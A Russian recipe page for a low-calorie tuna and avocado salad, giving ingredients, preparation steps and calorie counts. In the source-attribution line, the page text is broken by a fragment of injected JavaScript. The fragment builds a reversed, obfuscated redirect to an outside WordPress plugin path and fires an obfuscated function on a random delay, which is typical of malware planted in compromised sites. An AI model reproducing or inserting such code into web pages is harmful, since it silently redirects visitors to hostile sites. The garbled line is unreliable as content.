Если вы активно тренируетесь, чтобы привести себя в форму, то идеальная еда после занятия — салат, богатый белком. Низкокалорийный салат с тунцом и авокадо содержит около 20 граммов белка на порцию и много полезных жиров. Как приготовить это вкусное и очень простое блюдо — рассказывает Артём Соколов.
КАК УВЕЛИЧИТЬ КОЛИЧЕСТВО БЕЛКА В ОВОЩНОМ САЛАТЕ
Салат с тунцом
Фото: foodnetwork.com
Рецепт дня: салат с тунцом
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
20 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
2 порции
КАЛОРИЙНОСТЬ:
250—300 ккал
250 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Тунец (консервированный в собственном соку)
200 г
Яйца
4 шт.
Белая фасоль (консервированная или варёная)
300 г
Репчатый лук
1 шт.
Авокадо
1 шт.
Сельдерей
3 стебля
Зелень
по вкусу
Соль
по вкусу
- Сварите 4 яйца вкрутую.
- Нарежьте авокадо, лук и сельдерей средними кубиками.
- Измельчите консервированный тунец (тунец нужен обязательно кусковой; измельчённый или в масле не подойдёт).
- Измельчите белки яиц и два желтка.
- Смешайте все ингредиенты, добавьте фасоль, зелень и соль.
- Салат готов! Приятного аппетита!
РЕЦЕПТ ДНЯ: ПАСТА С ТУНЦОМ
РЕЦЕПТ ДНЯ: СЭНДВИЧ С ТУНЦОМ
РЕЦЕПТ ДНЯ: САЛАТ «НИСУАЗ» С ТУНЦОМ